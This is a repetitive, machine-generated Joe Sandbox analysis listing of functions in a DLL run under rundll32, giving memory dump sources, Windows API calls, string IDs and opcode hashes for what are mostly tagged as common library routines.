                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3791752519.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3791648369.0000000180000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792001676.000000018005F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792108362.0000000180073000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792216235.0000000180074000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794049644.0000000180077000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794230283.000000018007C000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794279409.000000018007D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Name::operator+
                                                                                                                                                                                                                                                  • String ID: {for
                                                                                                                                                                                                                                                  • API String ID: 2943138195-864106941
                                                                                                                                                                                                                                                  • Opcode ID: 0c0d30ad377e4ea5a3451009b1db462a15400a07ebc6bc3e0ddb6c2557d9ff17
                                                                                                                                                                                                                                                  • Instruction ID: 495a72a0baf00997086ff0ea6129483d1001404d3758be8f7ad89a7954a2554b
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0c0d30ad377e4ea5a3451009b1db462a15400a07ebc6bc3e0ddb6c2557d9ff17
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D9513A72605B88A9FB92DF68D4803EC77A1E349788F84D015FA485BB99DF78C799C340
                                                                                                                                                                                                                                                  Function 0000000180015AE0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 94COMMONLIBRARYCODE
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3791752519.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3791648369.0000000180000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792001676.000000018005F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792108362.0000000180073000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792216235.0000000180074000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794049644.0000000180077000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794230283.000000018007C000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794279409.000000018007D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: NameName::
                                                                                                                                                                                                                                                  • String ID: %lf
                                                                                                                                                                                                                                                  • API String ID: 1333004437-2891890143
                                                                                                                                                                                                                                                  • Opcode ID: 31f452ec5ec2fe0c56036b6d98129766a0febf28c96deb7dbc1a5cff6911fba6
                                                                                                                                                                                                                                                  • Instruction ID: 034e1c8f7962a666fb3fc1dfd84da393ef72e1dbc0cb733e50f71f00acf91dbc
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 31f452ec5ec2fe0c56036b6d98129766a0febf28c96deb7dbc1a5cff6911fba6
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B331C372604F8C85EBA2DF25A8503EA6351B74EBC5F54C216FA9A4B791DF2CC3498340
                                                                                                                                                                                                                                                  Function 000000018000F96C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • LoadLibraryExW.KERNEL32(?,?,00000000,000000018000FDBF,?,?,?,000000018000BE8E,?,?,?,000000018000BE49), ref: 000000018000F9F1
                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,00000000,000000018000FDBF,?,?,?,000000018000BE8E,?,?,?,000000018000BE49), ref: 000000018000F9FF
                                                                                                                                                                                                                                                  • LoadLibraryExW.KERNEL32(?,?,00000000,000000018000FDBF,?,?,?,000000018000BE8E,?,?,?,000000018000BE49), ref: 000000018000FA29
                                                                                                                                                                                                                                                  • FreeLibrary.KERNEL32(?,?,00000000,000000018000FDBF,?,?,?,000000018000BE8E,?,?,?,000000018000BE49), ref: 000000018000FA97
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,?,00000000,000000018000FDBF,?,?,?,000000018000BE8E,?,?,?,000000018000BE49), ref: 000000018000FAA3
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3791752519.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3791648369.0000000180000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792001676.000000018005F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792108362.0000000180073000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792216235.0000000180074000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794049644.0000000180077000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794230283.000000018007C000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794279409.000000018007D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                                                                                                  • String ID: api-ms-
                                                                                                                                                                                                                                                  • API String ID: 2559590344-2084034818
                                                                                                                                                                                                                                                  • Opcode ID: 08dec541e6110a4941d8e95383202020bda5a6dbff8e18ce6c91f5e870de479d
                                                                                                                                                                                                                                                  • Instruction ID: e8c6680ccd9c6dd87d65be781d57c711bd3b5d14812437631edbc0f748074d2d
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 08dec541e6110a4941d8e95383202020bda5a6dbff8e18ce6c91f5e870de479d
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DF318071312B4891EEA7DB12A8007E63394BB4DBE0F598635BD1D4BB95EF3CC6499301
                                                                                                                                                                                                                                                  Function 00000001800136C8 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 81COMMONLIBRARYCODE
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3791752519.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3791648369.0000000180000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792001676.000000018005F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792108362.0000000180073000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792216235.0000000180074000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794049644.0000000180077000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794230283.000000018007C000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794279409.000000018007D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Name::operator+Replicator::operator[]
                                                                                                                                                                                                                                                  • String ID: ,...$,<ellipsis>$...$<ellipsis>$void
                                                                                                                                                                                                                                                  • API String ID: 1405650943-2211150622
                                                                                                                                                                                                                                                  • Opcode ID: 11a5eadd5112610793a0c7985b347ede0ac6dc60e7be4f47023946e3fa5dab14
                                                                                                                                                                                                                                                  • Instruction ID: 1562cc7920372f8d96896f4d2247b54c2eb0bb003fb5d717fc29c8b40e6cc5f0
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 11a5eadd5112610793a0c7985b347ede0ac6dc60e7be4f47023946e3fa5dab14
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DA415FB6605F8898FBA28B68D8413EC77A0B30D788F54C415EA4817794DF79C749C711
                                                                                                                                                                                                                                                  Function 000000018001568C Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 79COMMONLIBRARYCODE
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3791752519.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3791648369.0000000180000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792001676.000000018005F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792108362.0000000180073000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792216235.0000000180074000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794049644.0000000180077000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794230283.000000018007C000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794279409.000000018007D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Name::operator+
                                                                                                                                                                                                                                                  • String ID: char $int $long $short $unsigned
                                                                                                                                                                                                                                                  • API String ID: 2943138195-3894466517
                                                                                                                                                                                                                                                  • Opcode ID: 22589a7dd1b7f51ecc45e5e498e836ee65e773c3e0422199170bc379ef7ced78
                                                                                                                                                                                                                                                  • Instruction ID: 33d68ee0dd99e5be83c02a107bf8deb86d92894b08a7c1c4eda6edb91acda212
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 22589a7dd1b7f51ecc45e5e498e836ee65e773c3e0422199170bc379ef7ced78
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 71316876614B58C8FB968F68E8513EC37B1B34D789F54C115EA885BBA8DF38C648C740
                                                                                                                                                                                                                                                  Function 000000018000FBA0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 72libraryloaderCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3791752519.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3791648369.0000000180000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792001676.000000018005F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792108362.0000000180073000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792216235.0000000180074000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794049644.0000000180077000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794230283.000000018007C000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794279409.000000018007D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                                                                                                  • String ID: api-ms-
                                                                                                                                                                                                                                                  • API String ID: 2559590344-2084034818
                                                                                                                                                                                                                                                  • Opcode ID: d889f2a22313e0ad3e013d7ebc648a4845f7bed772ca03482db31a9999fe791a
                                                                                                                                                                                                                                                  • Instruction ID: b4b3ab6b1088bd05896873025a869169f262880e2f39a8d17b8af41b45206a1e
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d889f2a22313e0ad3e013d7ebc648a4845f7bed772ca03482db31a9999fe791a
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D6218231601A4881FAA6CB16A9057A973A4BB4CBF0F5C8735FE2D47BD1EF38C6499300
                                                                                                                                                                                                                                                  Function 0000000180048058 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 71libraryCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3791752519.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3791648369.0000000180000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792001676.000000018005F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792108362.0000000180073000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792216235.0000000180074000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794049644.0000000180077000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794230283.000000018007C000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794279409.000000018007D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Library$Load$ErrorFreeLast
                                                                                                                                                                                                                                                  • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                                                  • API String ID: 3813093105-537541572
                                                                                                                                                                                                                                                  • Opcode ID: 4da3f0794fd9870cc95b278e97dc4f2c9283c1eed835cc8f1e9aaf627fd9e4b8
                                                                                                                                                                                                                                                  • Instruction ID: 16723c8e79fef191a1def12aff24d5b2aa2a9400166a0adaba498011b7871d09
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4da3f0794fd9870cc95b278e97dc4f2c9283c1eed835cc8f1e9aaf627fd9e4b8
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 36217531311E4481EEA6CB16A8407992294BF4CBF4F59CB21FE2A577D5DF38C64A9304
                                                                                                                                                                                                                                                  Function 000000018004832C Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 66libraryCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3791752519.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3791648369.0000000180000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792001676.000000018005F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792108362.0000000180073000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792216235.0000000180074000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794049644.0000000180077000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794230283.000000018007C000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794279409.000000018007D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Library$Load$ErrorFreeLast
                                                                                                                                                                                                                                                  • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                                                  • API String ID: 3813093105-537541572
                                                                                                                                                                                                                                                  • Opcode ID: 34d9fc0eea32f26ddee014de4325216aa93237d5f4069420858160f0f9dadc4b
                                                                                                                                                                                                                                                  • Instruction ID: 2907248bf1d03caf4a9efb5c727e6e4733018bdc7bf12693e50b486c0c56baec
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 34d9fc0eea32f26ddee014de4325216aa93237d5f4069420858160f0f9dadc4b
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3521D332311F5881EAA6DB1698403A92390FB4DFE4F198725EF2A437D0DF38C60A8344
                                                                                                                                                                                                                                                  Function 0000000180041790 Relevance: 10.6, APIs: 7, Instructions: 62COMMONLIBRARYCODE
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3791752519.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3791648369.0000000180000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792001676.000000018005F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792108362.0000000180073000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792216235.0000000180074000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794049644.0000000180077000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794230283.000000018007C000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794279409.000000018007D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Value$ErrorLast
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2506987500-0
                                                                                                                                                                                                                                                  • Opcode ID: 931a7e6b1cf67cd6299caf61b7569a609212fd61884ef39ea5164ef7719851e4
                                                                                                                                                                                                                                                  • Instruction ID: d1b00c180fb1e660eff0b05203a4b174045681b8f2dca1d24339f74a07491a67
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 931a7e6b1cf67cd6299caf61b7569a609212fd61884ef39ea5164ef7719851e4
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 56219F30704E0C45FAD7632155953FD1292BF4C7F9F1ACB18B836076C6EE288B095389
                                                                                                                                                                                                                                                  Function 00000001800415D4 Relevance: 10.6, APIs: 7, Instructions: 57COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3791752519.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3791648369.0000000180000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792001676.000000018005F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792108362.0000000180073000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792216235.0000000180074000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794049644.0000000180077000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794230283.000000018007C000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794279409.000000018007D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Value$ErrorLast
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2506987500-0
                                                                                                                                                                                                                                                  • Opcode ID: 381c2f5c7cc53769a437e8260949d7a39dcceed1a2f38c0e1111b755c595ed80
                                                                                                                                                                                                                                                  • Instruction ID: 04686a5da5c4fff237ec5e8ba751c2965937e5176a8ea2e8cb852f05b55094a1
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 381c2f5c7cc53769a437e8260949d7a39dcceed1a2f38c0e1111b755c595ed80
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A4116D30205E484AFAD6632155E53FD5242BB4C7F9F1ACB28B836077D6EE38CB095749
                                                                                                                                                                                                                                                  Function 000000018005B3FC Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3791752519.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3791648369.0000000180000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792001676.000000018005F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792108362.0000000180073000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792216235.0000000180074000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794049644.0000000180077000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794230283.000000018007C000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794279409.000000018007D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                                                                                                                                                  • String ID: CONOUT$
                                                                                                                                                                                                                                                  • API String ID: 3230265001-3130406586
                                                                                                                                                                                                                                                  • Opcode ID: b6eeb1184294491e34f956f19ce6396f0c04242531a228f3773a2e0d11010417
                                                                                                                                                                                                                                                  • Instruction ID: 83e0178ae380f36e1e9820465d588016c920ebf69cf6b00601a2110171500775
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b6eeb1184294491e34f956f19ce6396f0c04242531a228f3773a2e0d11010417
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 26119032310B8486E7A18B52F85535963A4F78CBE4F148224FA5987B94DF7DC6588740
                                                                                                                                                                                                                                                  Function 00000001800157B4 Relevance: 9.2, APIs: 6, Instructions: 161COMMONLIBRARYCODE
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3791752519.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3791648369.0000000180000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792001676.000000018005F000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792108362.0000000180073000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792216235.0000000180074000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794049644.0000000180077000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794230283.000000018007C000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794279409.000000018007D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Name::operator+$NameName::
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 168861036-0
                                                                                                                                                                                                                                                  • Opcode ID: 806119ddee8275eca90a34da7f6d98c465c2b67501ebe87a489ba9b8b95362ce
                                                                                                                                                                                                                                                  • Instruction ID: 09ad68218d141e964a4945e14ce8a54b78ee7b9198dbdf3b1dfc829bb6e04cef
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 806119ddee8275eca90a34da7f6d98c465c2b67501ebe87a489ba9b8b95362ce
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E7719D72610B98C9FB92CFA4E8803EC37A1F349795F61C016EA891B795DF79C659C301
                                                                                                                                                                                                                                                  Function 000000018000CDF8 Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 319COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3791752519.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3791648369.0000000180000000.00000002.00000001.01000000.00000005.sdmpDownload File
